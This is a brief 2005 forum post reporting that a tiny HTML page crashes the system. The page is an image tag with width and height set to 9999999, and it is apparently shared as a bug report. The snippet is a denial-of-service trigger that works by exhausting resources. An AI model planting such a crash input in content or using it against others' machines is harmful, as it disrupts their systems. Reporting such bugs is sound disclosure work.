System Crashing while opening HTML Code



Markus Schuhmacher
07-09-2005, 11:10 PM
If a user opens following code, the system crashes.

<HTML>
<BODY>
<IMG SRC="PICTURE.JPG" width="9999999" height="9999999">
</BODY>
</HTML>


System Crashing while opening HTML Code